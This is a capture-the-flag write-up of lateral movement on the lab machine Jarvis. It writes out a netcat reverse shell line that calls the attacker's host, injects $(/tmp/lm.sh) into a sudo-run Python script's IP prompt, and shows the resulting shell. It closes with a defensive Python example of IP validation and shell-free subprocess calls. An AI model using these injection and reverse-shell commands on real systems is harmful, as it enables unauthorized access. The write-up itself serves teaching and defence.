As I analyzed the Python script /var/www/Admin-Utilities/simpler.py, I noticed I may be able to use a subshell, $(), to execute an arbitrary command from inside the script.
Since I cannot use any of the blacklisted characters, I would be better off creating an executable and calling that instead.
www-data@jarvis:/tmp$ echo 'nc 10.10.14.11 8888 -e /bin/bash' > lm.sh ; chmod 777 /tmp/lm.sh
www-data@jarvis:/tmp$ cat lm.sh
nc 10.10.14.11 8888 -e /bin/bash
I made a bash script with a Netcat reverse shell command in it and saved it to /tmp/lm.sh.
I will use this to get a shell session as the pepper user.
www-data@jarvis:/tmp$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es
***********************************************
enter an ip: $(/tmp/lm.sh)
I executed the Python script as the pepper user with sudo privileges and, at the IP prompt, entered the subshell that calls the malicious bash script.
The script just hangs.
┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.143] 51618
whoami
pepper
hostname
jarvis
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.143 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:be29 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:be29 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:be:29 txqueuelen 1000 (Ethernet)
RX packets 1502274 bytes 299571648 (285.6 MiB)
RX errors 0 dropped 41 overruns 0 frame 0
TX packets 1486878 bytes 614864094 (586.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1 (Local Loopback)
RX packets 4812 bytes 550091 (537.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4812 bytes 550091 (537.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
But I got a shell on the other side.
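The root cause above is a character blacklist applied to a value that is later handed to a shell: $(...) contains none of the usual blacklisted characters, so it passes. The fix is to validate the input against what it is supposed to be (an IP address) and to invoke the command without a shell at all. The following is an added illustration, not the original simpler.py; the blacklist is a constructed one and ping_host, passes_blacklist and validate_ip are hypothetical names.

```python
import ipaddress
import subprocess
from typing import Optional

# Constructed blacklist for illustration; the real simpler.py list is not
# reproduced on this page. Note that "$", "(", ")", "/" and "." are absent.
BLACKLIST = set("&;-`|\"'")


def passes_blacklist(value: str) -> bool:
    """Weak check: rejects only a fixed set of characters.

    Anything not in the set, including a $(...) subshell, slips through.
    """
    return not any(ch in BLACKLIST for ch in value)


def validate_ip(value: str) -> Optional[str]:
    """Strong check: accept only a syntactically valid IPv4/IPv6 address.

    Returns the normalised address, or None if the value is not an address.
    Shell syntax can never be a valid address, so it is rejected here.
    """
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        return None


def ping_host(value: str) -> int:
    """Ping the given address once, refusing anything that is not an address."""
    ip = validate_ip(value)
    if ip is None:
        raise ValueError(f"not an IP address: {value!r}")
    # argv list, shell=False: the value is passed as a single argument and is
    # never parsed by /bin/sh, so no subshell or separator is interpreted.
    result = subprocess.run(
        ["ping", "-c", "1", "-W", "1", ip],
        capture_output=True,
        check=False,
    )
    return result.returncode


if __name__ == "__main__":
    for candidate in ["10.10.10.143", "$(/tmp/lm.sh)"]:
        print(candidate, "blacklist:", passes_blacklist(candidate),
              "ip:", validate_ip(candidate))
```

Running the module shows the subshell string passing the blacklist but failing the address check; ping_host therefore never reaches subprocess with it.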
Lateral Movement to the pepper user